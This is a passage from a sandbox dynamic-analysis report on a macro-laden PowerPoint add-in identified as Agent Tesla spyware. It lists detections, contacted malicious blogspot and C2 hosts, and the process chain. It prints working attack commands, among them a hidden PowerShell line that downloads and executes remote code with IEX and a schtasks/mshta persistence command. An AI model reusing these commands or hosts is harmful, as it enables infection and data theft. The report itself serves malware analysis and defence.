Upload
others
View
8
Download
0
Embed Size (px)
Citation preview
DYNAMIC ANALYSIS REPORT#2111629
MALICIOUS
Classifications: Injector Downloader Spyware
Threat Names: Agent Tesla v3 Mal/HTMLGen-A VB:Trojan.Valyria.4205
Verdict Reason: -
Sample Type Powerpoint Document
File Name 9_pdf.ppam
ID #838001
MD5 8338e340a6e070805616aee57601706d
SHA1 b47fb0ae8bdf11a58ebcebb514dfd3c8fd4b7826
SHA256 8e59758c7dba0ca744790644a23fa08c1e416e8f38ee221868b6560a2c915b51
File Size 8.80 KB
Report Created 2021-08-09 15:13 (UTC+2)
Target Environment win7_64_sp1_en_mso2016 | ms_office
X-Ray Vision for Malware - www.vmray.com 1 / 60
DYNAMIC ANALYSIS REPORT#2111629
OVERVIEW
VMRay Threat Identifiers (26 rules, 52 matches)
Score Category Operation Count Classification
5/5 System Modification Modifies operating system directory 1 -
(Process #14) aspnet_compiler.exe creates file "C:\Windows\system32\drivers\etc\hosts" in the OS directory.•
5/5 YARA Malicious content matched by YARA rules 1 Spyware
Rule "AgentTesla_StringDecryption_v3" from ruleset "Malware" has matched on a memory dump for (process #14) aspnet_compiler.exe.•
4/5 Obfuscation Reads from memory of another process 3 -
(Process #6) powershell.exe reads from (process #14) aspnet_compiler.exe.
(Process #6) powershell.exe reads from (process #15) aspnet_compiler.exe.
(Process #6) powershell.exe reads from (process #16) aspnet_compiler.exe.
•
•
•
4/5 Antivirus Malicious content was detected by heuristic scan 3 -
Built-in AV detected a downloaded file as "VBS.Heur.Asthma.1.82A465E6.Gen".
Built-in AV detected a downloaded file as "VB:Trojan.Valyria.4205".
Built-in AV detected "VBS.Heur.Asthma.1.82A465E6.Gen" in the PCAP of the analysis.
•
•
•
4/5 Injection Writes into the memory of another process 2 Injector
(Process #6) powershell.exe modifies memory of (process #14) aspnet_compiler.exe.
(Process #6) powershell.exe modifies memory of (process #16) aspnet_compiler.exe.
•
•
4/5 Injection Modifies control flow of another process 2 -
(Process #6) powershell.exe alters context of (process #14) aspnet_compiler.exe.
(Process #6) powershell.exe alters context of (process #16) aspnet_compiler.exe.
•
•
4/5 Execution Document tries to create process 1 -
Document creates (process #3) mshta.exe.•
4/5 Reputation Contacts known malicious URL 4 -
Reputation analysis labels the contacted URL "http://bukbukbukak.blogspot.com/p/9.html" as "Mal/HTMLGen-A".
Reputation analysis labels the URL "http://1230948%[email protected]/p/9.html" which was contacted by (process #13) mshta.exe as "Mal/HTMLGen-A".
Reputation analysis labels the URL "https://bukbukbukak.blogspot.com/p/9.html" which was contacted by (process #13) mshta.exe as "Mal/HTMLGen-A".
Reputation analysis labels the contacted URL "https://bukbukbukak.blogspot.com/js/cookienotice.js" as "Mal/HTMLGen-A".
•
•
•
•
4/5 Reputation Resolves known malicious domain 1 -
Reputation analysis labels the resolved domain "bukbukbukak.blogspot.com" as "Mal/HTMLGen-A".•
4/5 Task Scheduling Schedules task 1 -
Schedules task for command "MsHtA", to be triggered by Time. Task has been rescheduled by the analyzer.•
4/5 Task Scheduling Schedules task via schtasks 2 -
Schedules task """BlueStacksIUptad""" via the schtasks command line utility.
Schedules task "BlueStacksIUptad" via the schtasks command line utility.
•
•
X-Ray Vision for Malware - www.vmray.com 2 / 60
DYNAMIC ANALYSIS REPORT#2111629
Score Category Operation Count Classification
4/5 Network Connection Performs DNS request 4 -
(Process #6) powershell.exe resolves host name "92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com" to IP "34.102.176.152".
(Process #6) powershell.exe resolves host name "35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com" to IP "34.102.176.152".
(Process #10) powershell.exe resolves host name "35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com" to IP "34.102.176.152".
(Process #10) powershell.exe resolves host name "www.google.com" to IP "172.217.23.100".
•
•
•
•
4/5 Network Connection Connects to remote host 4 -
(Process #6) powershell.exe opens an outgoing TCP connection to host "34.102.176.152:443".
(Process #10) powershell.exe opens an outgoing TCP connection to host "172.217.23.100:80".
(Process #10) powershell.exe opens an outgoing TCP connection to host "34.102.176.152:443".
(Process #14) aspnet_compiler.exe opens an outgoing TCP connection to host "180.214.239.67:80".
•
•
•
•
4/5 Network Connection Downloads file 1 Downloader
Downloads file via http from http://pki.goog/gsr1/gsr1.crt.•
4/5 Network Connection Attempts to connect through HTTP 4 -
(Process #10) powershell.exe connects to "http://www.google.com/".
(Process #10) powershell.exe failed to connect to "http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRecgPDGLadxIgGIhCsvzDNI0n-EbyITWaDWe2KMgFy".
(Process #14) aspnet_compiler.exe connects to "http://180.214.239.67/k/p9i/inc/b61f0c2fdfd137.php".
(Process #13) mshta.exe failed to connect to "http://1230948%[email protected]/p/9.html".
•
•
•
•
4/5 Network Connection Attempts to connect through HTTPS 8 -
(Process #3) mshta.exe connects to "https://fckusecurityresearchermotherfkrs.blogspot.com/p/9_17.html".
(Process #3) mshta.exe connects to "https://www.bitly.com/ddwddwwkfwdwoooi".
(Process #3) mshta.exe connects to "https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Ffckusecurityresearchermotherfkrs.blogspot.com%2Fp%2F9_17.html&type=blog&bpli=1".
(Process #6) powershell.exe connects to "https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_38b5f8d731e148338a8c245338c3ed54.txt".
(Process #6) powershell.exe connects to "https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_75b3013f776c45d9b3d3d4d971e7234d.txt".
(Process #10) powershell.exe connects to "https://35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com/ugd/35d427_aba34aefaf6944578eaddcbf518b0d51.txt".
(Process #13) mshta.exe connects to "https://accounts.google.com/ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotUR... ...//www.blogger.com/blogin.g?blogspotURL%3Dhttps://bukbukbukak.blogspot.com/p/9.html%26type%3Dblog%26bpli%3D1&passive=true&go=true".
(Process #13) mshta.exe connects to "https://bukbukbukak.blogspot.com/p/9.html".
•
•
•
•
•
•
•
•
3/5 Discovery Enumerates running processes 1 -
(Process #6) powershell.exe enumerates running processes.•
3/5 Persistence Installs system startup script or application 1 -
(Process #10) powershell.exe adds "c:\users\keecfmwgj\appdata\roaming\microsoft\windows\start menu\programs\startup\onedrive.vbs" to Windows startup folder.•
2/5 Hide Tracks Writes an unusually large amount of data to the registry 1 -
(Process #13) mshta.exe hides 37094 bytes in "HKEY_CURRENT_USER\Software\cookerr".•
2/5 Discovery Reads network adapter information 1 -
(Process #14) aspnet_compiler.exe reads the network adapters' addresses by API.•
2/5 Execution Office macro uses an execute function 1 -
Office macro uses the shellexecute function.•
2/5 Execution Executes macro on specific event 1 -
X-Ray Vision for Malware - www.vmray.com 3 / 60
DYNAMIC ANALYSIS REPORT#2111629
Score Category Operation Count Classification
Executes macro automatically on target "document" and event "open".•
2/5 Execution Creates suspicious COM object 1 -
Office macro creates suspicious Shell.Application COM object.•
2/5 Obfuscation Document contains obfuscated macros 1 -
C:\Users\kEecfMwgj\Desktop\9_pdf.ppam contains an obfuscated macro.•
2/5 Defense Evasion URL contains unusual backslashes 1 -
Extracted URL http://1230948%[email protected]/p/9.html\ does not use the standard URL syntax.•
1/5 Execution Contains suspicious Office macro 1 -
Office document contains a suspicious VBA macro.•
- Trusted Known clean file 2 -
A file which was only downloaded to memory is a known clean file.
File "C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RIJUQL1C\error[1]" is a known clean file.
•
•
- Trusted File has embedded known clean URL 1 -
Extracted URL "https://translate.google.de/?hl=de&tab=jT" is a known clean URL.•
X-Ray Vision for Malware - www.vmray.com 4 / 60
DYNAMIC ANALYSIS REPORT#2111629
Mitre ATT&CK Matrix
Initial Access Execution PersistencePrivilege
EscalationDefenseEvasion
CredentialAccess
DiscoveryLateral
MovementCollection
Commandand Control
Exfiltration Impact
#T1064Scripting
#T1060Registry RunKeys / Startup
Folder
#T1053Scheduled
Task
#T1112 ModifyRegistry
#T1057Process
Discovery
#T1105Remote File
Copy
#T1071Standard
ApplicationLayer Protocol
#T1053Scheduled
Task
#T1053Scheduled
Task
#T1064Scripting
#T1016SystemNetwork
ConfigurationDiscovery
#T1105Remote File
Copy
#T1032Standard
CryptographicProtocol
X-Ray Vision for Malware - www.vmray.com 5 / 60
DYNAMIC ANALYSIS REPORT#2111629
Sample Information
Analysis Information
ID #838001
MD5 8338e340a6e070805616aee57601706d
SHA1 b47fb0ae8bdf11a58ebcebb514dfd3c8fd4b7826
SHA256 8e59758c7dba0ca744790644a23fa08c1e416e8f38ee221868b6560a2c915b51
SSDeep 192:37Xq/ea9PRww1JU7YnRS3yLbKR8KbwJgnUY2:30eakIU0nRdnKbfUY2
File Name 9_pdf.ppam
File Size 8.80 KB
Sample Type Powerpoint Document
Has Macros
Creation Time 2021-08-09 15:13 (UTC+2)
Analysis Duration 00:04:05
Termination Reason Timeout
Number of Monitored Processes 20
Execution Successful False
Reputation Enabled
WHOIS Enabled
Built-in AV Enabled
Built-in AV Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files
Number of AV Matches 1
YARA Enabled
YARA Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files
Number of YARA Matches 1
X-Ray Vision for Malware - www.vmray.com 6 / 60
DYNAMIC ANALYSIS REPORT#2111629
X-Ray Vision for Malware - www.vmray.com 7 / 60
DYNAMIC ANALYSIS REPORT#2111629
Screenshots truncated
X-Ray Vision for Malware - www.vmray.com 8 / 60
DYNAMIC ANALYSIS REPORT#2111629
NETWORK
General
DNS
HTTP/S
HTTP Requests
Method URL Dest. IP Dest. Port Status Code Response Size Verdict
32.23 KB total sent
2018.46 KB total received
2 ports 80, 443
11 contacted IP addresses
74 URLs extracted
31 files downloaded
0 malicious hosts detected
10 DNS requests for 8 domains
1 nameservers contacted
0 total requests returned errors
19 URLs contacted, 9 servers
14 sessions, 32.23 KB sent, 2018.46 KB received
http://1230948%[email protected]/p/9.html\
- - 0 bytes NA
http://1230948%[email protected]/p/9.html
- - 0 bytes NA
GET http://bitly.com/ddwddwwkfwdwoooi - - 0 bytes NA
GET http://pki.goog/gsr1/gsr1.crt - - 0 bytes NA
GET http://bukbukbukak.blogspot.com/p/9.html - - 0 bytes NA
GET http://www.google.com/ - - 0 bytes NA
GEThttp://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRecgPDGLadxIgGIhCsvzDNI0n-EbyITWaDWe2KMgFy
- - 0 bytes NA
POST http://180.214.239.67/k/p9i/inc/b61f0c2fdfd137.php - - 0 bytes NA
GET //www.google.com/policies/terms/ - - 0 bytes NA
GET //support.google.com/websearch/answer/86640 - - 0 bytes NA
https://www.bitly.com/ddwddwwkfwdwoooi - - 0 bytes NA
https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_38b5f8d731e148338a8c245338c3ed54.txt
- - 0 bytes NA
https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_75b3013f776c45d9b3d3d4d971e7234d.txt
- - 0 bytes NA
https://35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com/ugd/35d427_aba34aefaf6944578eaddcbf518b0d51.txt
- - 0 bytes NA
https://35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com/ugd/35d427_02df7f9ae2d74130872a6c4165f7ed60.txt
- - 0 bytes NA
X-Ray Vision for Malware - www.vmray.com 9 / 60
DYNAMIC ANALYSIS REPORT#2111629
Method URL Dest. IP Dest. Port Status Code Response Size Verdict
GEThttps://fckusecurityresearchermotherfkrs.blogspot.com/p/9_17.html
- - 0 bytes NA
GEThttps://fckusecurityresearchermotherfkrs.blogspot.com/js/cookienotice.js
- - 0 bytes NA
GET
https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Ffckusecurityresearchermotherfkrs.blogspot.com%2Fp%2F9_17.html&type=blog&bpli=1
- - 0 bytes NA
GET https://fonts.googleapis.com/css?family=Open+Sans:300 - - 0 bytes NA
GEThttps://fonts.googleapis.com/css?lang=de&family=Product+Sans|Roboto:400,700
- - 0 bytes NA
GET
https://accounts.google.com/ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://bukbukbukak.blogspot.com/... ...s://www.blogger.com/blogin.g?blogspotURL%3Dhttps://bukbukbukak.blogspot.com/p/9.html%26type%3Dblog%26bpli%3D1&passive=true&go=true
- - 0 bytes NA
GET https://bukbukbukak.blogspot.com/p/9.html - - 0 bytes NA
GET https://bukbukbukak.blogspot.com/js/cookienotice.js - - 0 bytes NA
GET https://www.google.com/recaptcha/api.js - - 0 bytes NA
GEThttps://www.blogger.com/static/v1/widgets/3822632116-css_bundle_v2.css
- - 0 bytes NA
GEThttps://fckusecurityresearchermotherfkrs.blogspot.com/favicon.ico
- - 0 bytes NA
GEThttps://www.blogger.com/dyn-css/authorization.css?targetBlogID=644545533916229546&zx=551455ad-7f93-402f-89a1-d9e43c6794f5
- - 0 bytes NA
GET https://fckusecurityresearchermotherfkrs.blogspot.com/ - - 0 bytes NA
GEThttps://www.blogger.com/blogin.g?blogspotURL=https://fckusecurityresearchermotherfkrs.blogspot.com/p/9_17.html&type=blog
- - 0 bytes NA
GEThttps://www.blogger.com/static/v1/widgets/2583860411-widgets.js
- - 0 bytes NA
GET
https://www.blogger.com/age-verification.g?blogspotURL=https://fckusecurityresearchermotherfkrs.blogspot.com/p/9_17.html&from=APq4FmCi5NBs1f3axOfaSfoosWI5gDvOWPuVdwMn7HZMV1Hu00EksHZcLZ8-Uz03byZEC6CvHoy-fLnoyhgJ3-myRV-oRFV6mg
- - 0 bytes NA
GET https://www.blogger.com - - 0 bytes NA
GEThttps://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbukbukbukak.blogspot.com%2Fp%2F9.html&type=blog&bpli=1
- - 0 bytes NA
GEThttps://www.blogger.com/static/v1/v-css/281434096-static_pages.css
- - 0 bytes NA
GET https://www.google.de/intl/de/about/products?tab=jh - - 0 bytes NA
GEThttps://myaccount.google.com/?utm_source=OGB&tab=jk&utm_medium=app
- - 0 bytes NA
GET https://www.google.de/webhp?tab=jw - - 0 bytes NA
GET https://maps.google.de/maps?hl=de&tab=jl - - 0 bytes NA
GET https://www.youtube.com/?gl=DE&tab=j1 - - 0 bytes NA
GET https://play.google.com/?hl=de&tab=j8 - - 0 bytes NA
GET https://news.google.com/?tab=jn - - 0 bytes NA
GET https://mail.google.com/mail/?tab=jm - - 0 bytes NA
X-Ray Vision for Malware - www.vmray.com 10 / 60
DYNAMIC ANALYSIS REPORT#2111629
Method URL Dest. IP Dest. Port Status Code Response Size Verdict
GET https://meet.google.com/?hs=197 - - 0 bytes NA
GET https://chat.google.com/ - - 0 bytes NA
GET https://contacts.google.com/?hl=de&tab=jC - - 0 bytes NA
GET https://drive.google.com/?tab=jo - - 0 bytes NA
GET https://calendar.google.com/calendar?tab=jc - - 0 bytes NA
GET https://translate.google.de/?hl=de&tab=jT - - 0 bytes NA
GET https://photos.google.com/?tab=jq&pageId=none - - 0 bytes NA
GET https://duo.google.com/?usp=duo_ald - - 0 bytes NA
GET
https://www.google.com/chrome/?brand=CHZO&utm_source=google.com&utm_medium=desktop-app-launcher&utm_campaign=desktop-app-launcher&utm_content=chrome-logo&utm_keyword=CHZO
- - 0 bytes NA
GET https://www.google.de/shopping?hl=de&source=og&tab=jf - - 0 bytes NA
GET https://docs.google.com/document/?usp=docs_alc - - 0 bytes NA
GET https://docs.google.com/spreadsheets/?usp=sheets_alc - - 0 bytes NA
GET https://docs.google.com/presentation/?usp=slides_alc - - 0 bytes NA
GET https://books.google.de/?hl=de&tab=jp - - 0 bytes NA
GET https://www.blogger.com/?tab=jj - - 0 bytes NA
GET https://hangouts.google.com/ - - 0 bytes NA
GET https://keep.google.com/ - - 0 bytes NA
GET https://jamboard.google.com/?usp=jam_ald - - 0 bytes NA
GET https://earth.google.com/web/ - - 0 bytes NA
GET https://www.google.de/save - - 0 bytes NA
GEThttps://artsandculture.google.com/?hl=de&utm_source=ogs.google.com&utm_medium=referral
- - 0 bytes NA
GEThttps://ads.google.com/home/?subid=ww-ww-et-g-aw-a-vasquette_ads_cons_1!o2
- - 0 bytes NA
GET https://podcasts.google.com/ - - 0 bytes NA
GET https://stadia.google.com/ - - 0 bytes NA
GET https://www.google.com/travel/?dest_src=al - - 0 bytes NA
GET https://docs.google.com/forms/?usp=forms_alc - - 0 bytes NA
GEThttps://accounts.google.com/ServiceLogin?service=blogger&continue=https://www.blogger.com/blogger.g&ec=GAZAHg
- - 0 bytes NA
GET https://www.blogger.com/go/helpcenter - - 0 bytes NA
GET https://www.blogger.com/go/discuss - - 0 bytes NA
GET https://www.blogger.com/go/tutorials - - 0 bytes NA
GET https://www.blogger.com/go/buzz - - 0 bytes NA
GET https://www.blogger.com/go/devapi - - 0 bytes NA
GET https://www.blogger.com/go/devforum - - 0 bytes NA
GET https://www.blogger.com/go/terms - - 0 bytes NA
X-Ray Vision for Malware - www.vmray.com 11 / 60
DYNAMIC ANALYSIS REPORT#2111629
Method URL Dest. IP Dest. Port Status Code Response Size Verdict
DNS Requests
Type Hostname Response Code Resolved IPs CNames Verdict
GET https://www.blogger.com/go/privacy - - 0 bytes NA
GET https://www.blogger.com/go/contentpolicy - - 0 bytes NA
GET https://www.google.de/contact/impressum.html - - 0 bytes NA
GET https://www.google-analytics.com/analytics.js - - 0 bytes NA
GEThttps://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js
- - 0 bytes NA
GET https://bukbukbukak.blogspot.com/favicon.ico - - 0 bytes NA
GEThttps://www.blogger.com/dyn-css/authorization.css?targetBlogID=3230375044160936909&zx=74bb4738-53be-4905-9fa3-25325b11a73a
- - 0 bytes NA
GET https://bukbukbukak.blogspot.com/ - - 0 bytes NA
GEThttps://www.blogger.com/blogin.g?blogspotURL=https://bukbukbukak.blogspot.com/p/9.html&type=blog
- - 0 bytes NA
A www.bitly.com, bitly.com NoError67.199.248.14,67.199.248.15
bitly.com NA
Afckusecurityresearchermotherfkrs.blogspot.com,blogspot.l.googleusercontent.com
NoError 216.58.212.161blogspot.l.googleusercontent.com
NA
A pki.goog NoError 216.239.32.29 NA
A fonts.googleapis.com NoError 142.250.74.202 NA
A92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com,media-router.wixstatic.com, gcp.media-router.wixstatic.com
NoError 34.102.176.152media-router.wixstatic.com,gcp.media-router.wixstatic.com
NA
A35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com,media-router.wixstatic.com, gcp.media-router.wixstatic.com
NoError 34.102.176.152media-router.wixstatic.com,gcp.media-router.wixstatic.com
NA
Abukbukbukak.blogspot.com,blogspot.l.googleusercontent.com
NoError 216.58.212.161blogspot.l.googleusercontent.com
NA
- 35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com - 34.102.176.152 NA
- www.google.com - 172.217.23.100 NA
X-Ray Vision for Malware - www.vmray.com 12 / 60
DYNAMIC ANALYSIS REPORT#2111629
BEHAVIOR
Process Graph
Sample Start#1
powerpnt.exe#2
outlook.exeRPC Server #3
mshta.exeChild Process
#4svchost.exe
RPC Server
#5powershell.exe
Child Process
#6powershell.exe
Child Process
#10powershell.exe
Child Process
#7wmiprvse.exe
RPC Server
#12taskeng.exe
Child Process
#11schtasks.exeChild Process
#14aspnet_compiler.exe
Modify Memory
Modify Control Flow
Child Process
#15aspnet_compiler.exe
Child Process
#16aspnet_compiler.exe
Modify Memory
Modify Control Flow
Child Process
#21powershell.exe
Child Process
#18wscript.exe
Child Process
#22wscript.exe
Child Process
#13mshta.exe
Child Process
#19powershell.exe
Child Process #20schtasks.exe
Child Process
#23powershell.exe
Child Process
X-Ray Vision for Malware - www.vmray.com 13 / 60
DYNAMIC ANALYSIS REPORT#2111629
Process #1: powerpnt.exe
ID 1
File Name c:\program files (x86)\microsoft office\root\office16\powerpnt.exe
Command Line "C:\Program Files (x86)\Microsoft Office\Root\Office16\POWERPNT.EXE"
Initial Working Directory C:\Users\kEecfMwgj\Desktop\
Monitor Start Time Start Time: 33976, Reason: Analysis Target
Unmonitor End Time End Time: 279253, Reason: Terminated by Timeout
Monitor duration 245.28s
Return Code Unknown
PID 3344
Parent PID 1124
Bitness 32 Bit
X-Ray Vision for Malware - www.vmray.com 14 / 60
DYNAMIC ANALYSIS REPORT#2111629
Process #2: outlook.exe
ID 2
File Name c:\program files (x86)\microsoft office\root\office16\outlook.exe
Command Line "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 51813, Reason: RPC Server
Unmonitor End Time End Time: 105867, Reason: Terminated
Monitor duration 54.05s
Return Code 0
PID 3616
Parent PID 584
Bitness 32 Bit
X-Ray Vision for Malware - www.vmray.com 15 / 60
DYNAMIC ANALYSIS REPORT#2111629
Process #3: mshta.exe
Dropped Files (25)
File Name File Size SHA256 YARA Match
ID 3
File Name c:\windows\syswow64\mshta.exe
Command Line C:\Windows\SysWOW64\mshta.exe https://www.bitly.com/ddwddwwkfwdwoooi
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 85089, Reason: Child Process
Unmonitor End Time End Time: 141359, Reason: Terminated
Monitor duration 56.27s
Return Code 0
PID 3720
Parent PID 3616
Bitness 32 Bit
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\mem5YaGs126MiZpBA-UN_r8OUuht[1].eot
15.60 KB01e698231e9d93dceaa9a97f4e5cdbdbceefbea67d4e39acd0391e1cae00889b
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternetFiles\Content.IE5\MM5O9XQS\kJEjBvgX7BgnkSrUwT8UnLVc38YydejYY-oE_LvN[1].eot
152.93 KB22f8356c61b22b8a6506465087d48d831303e10c66bd3ced965f6a32a7302dde
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternetFiles\Content.IE5\PMMR5K9K\pxiDypQkot1TnFhsFMOfGShVF9eK[1].eot
27.95 KBf0da44c78fae13b0c7078626f17f4b5b60ef9e396d6cfc5cec5304d17c358d1a
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternetFiles\Content.IE5\RIJUQL1C\KFOmCnqEu92Fr1Mu4mxO[1].eot
17.40 KBbe869a73a160440e8bfc5c7d84a907febd61075d920d51c7d0097d7295c865cd
- 32.91 KBdc82cadcaad72e4f7aa996a149126ecb15e652606e55a12efcb994a16f5159a9
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\cookienotice[1].js
6.36 KB068ffe90977f2b5b2dc2ef18572166e85281bd0ecb31c4902464b23db54d2568
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\3822632116-css_bundle_v2[1].css
36.12 KB224d95cce08108610c46ef4134793dbdd619e43e90e9d9cf42716a08f45222f9
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\PMMR5K9K\3046902713-ieretrofit[1].js
26.01 KB5993c37fe8dfca6e242e6e5b7c48ae99c9d41a8fe3d209dd38a0d161516b519a
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\2583860411-widgets[1].js
147.02 KB9d358297f944faf6cfd24e3069ef42fa2aaef6fe243b61389a9a02c8d6de9a50
- 149.99 KB25a34aed1f1f78b098376e9e7b6785fa7eaf3d9281192ff5e3915e6083ec8450
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\3101730221-analytics_autotrack[1].js
24.70 KB21cc4dc6c3c01b84c808004173f42e3ed1b4f09551a10d69b4cec7394a1590e6
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\authorization[1].css
1 bytes01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\281434096-static_pages[1].css
3.72 KB0fc52ef116f03fd95f9857856f1e2cbdfa2cacc398e066db0d8d5481739bc2d7
- 1.13 KBcbad27c35fbc84e2da4280476adeb197566db2750b8b4a79eb7e872db8d8acb7
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\PMMR5K9K\css[1].txt
172 bytes3e6e1c58507746b01dd0f74cd9d40c885ffaea0cc025eb4f27c4c947916f2068
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\css[1].txt
402 bytes49d0d1473181447caad524188bfcb1344b20a4ffa42bb0b5ff7695e379ae3b79
X-Ray Vision for Malware - www.vmray.com 16 / 60
DYNAMIC ANALYSIS REPORT#2111629
File Name File Size SHA256 YARA Match
Host Behavior
Type Count
Network Behavior
Type Count
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\maia[1].css
42.48 KB8684a32d1a10d050a26fc33192edf427a5f0c6874c590a68d77ae6e0d186bd8a
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\analytics[1].js
48.23 KBe61660c659c426e45bce2937dddb01af6b550502a2904546575c1ec2ba1121dd
- 95 bytes0fdcb4746995f0d5240e5ec11370cb950722a894f3cff4118aa68ccc92010edd
- 403 bytesecb30886406e3f776ff7bc3834de849944471e626ff148bed2fa389d02866044
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\error[1]
3.17 KB7990e703ae060c241eba6257d963af2ecf9c6f3fbdb57264c1d48dda8171e754
- 97 bytes0b113b5594ea4cfeb6346d6f997c2dd8a1623037a855b9f896093ec1e1426811
- 195 bytesbf0a747e7005ace88140897c4c166749eaffcd9f96286c431fa3409709a0b344
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\PMMR5K9K\error[1]
4.12 KB966240c0527b20e8e2553b7e5a68594ae69230aa00186f2c6c2c342405494837
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\PMMR5K9K\warning[1]
1.04 KB5f95eff2bcaaea82d0ae34a007de3595c0d830ac4810ea4854e6526e261108e9
System 312
Module 190
File 122
Environment 2
Registry 184
- 5
Keyboard 2
Mutex 1
Window 24
COM 66
- 2
Process 1
HTTPS 3
TCP 4
X-Ray Vision for Malware - www.vmray.com 17 / 60
DYNAMIC ANALYSIS REPORT#2111629
Process #4: svchost.exe
ID 4
File Name c:\windows\system32\svchost.exe
Command Line C:\Windows\system32\svchost.exe -k netsvcs
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 92649, Reason: RPC Server
Unmonitor End Time End Time: 279253, Reason: Terminated by Timeout
Monitor duration 186.60s
Return Code Unknown
PID 816
Parent PID 464
Bitness 64 Bit
X-Ray Vision for Malware - www.vmray.com 18 / 60
DYNAMIC ANALYSIS REPORT#2111629
Process #5: powershell.exe
Host Behavior
Type Count
ID 5
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /create /sc MINUTE /mo 80 /tn ""BlueStacksIUptad"" /F /tr ""\""MsHtA http://1230948%[email protected]/p/9.html\""
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 107348, Reason: Child Process
Unmonitor End Time End Time: 171684, Reason: Terminated
Monitor duration 64.34s
Return Code 0
PID 3808
Parent PID 3720
Bitness 32 Bit
System 4
Module 3
File 23
Environment 14
Registry 2
Process 1
- 13
X-Ray Vision for Malware - www.vmray.com 19 / 60
DYNAMIC ANALYSIS REPORT#2111629
Process #6: powershell.exe
Host Behavior
Type Count
Network Behavior
Type Count
ID 6
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Cre... ...-904d-daf4679f14d5.usrfiles.com/ugd/92c492_75b3013f776c45d9b3d3d4d971e7234d.txt').GetResponse().GetResponseStream()).ReadToend());
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 107858, Reason: Child Process
Unmonitor End Time End Time: 194728, Reason: Terminated
Monitor duration 86.87s
Return Code 0
PID 3828
Parent PID 3720
Bitness 32 Bit
System 38
Module 12
File 535
Environment 38
Registry 94
Process 6
- 38
- 7
- 16
HTTPS 2
DNS 2
TCP 1
X-Ray Vision for Malware - www.vmray.com 20 / 60
DYNAMIC ANALYSIS REPORT#2111629
Process #7: wmiprvse.exe
ID 7
File Name c:\windows\system32\wbem\wmiprvse.exe
Command Line C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 110365, Reason: RPC Server
Unmonitor End Time End Time: 279253, Reason: Terminated by Timeout
Monitor duration 168.89s
Return Code Unknown
PID 2812
Parent PID 584
Bitness 64 Bit
X-Ray Vision for Malware - www.vmray.com 21 / 60
DYNAMIC ANALYSIS REPORT#2111629
Process #10: powershell.exe
Dropped Files (7)
File Name File Size SHA256 YARA Match
Host Behavior
Type Count
Network Behavior
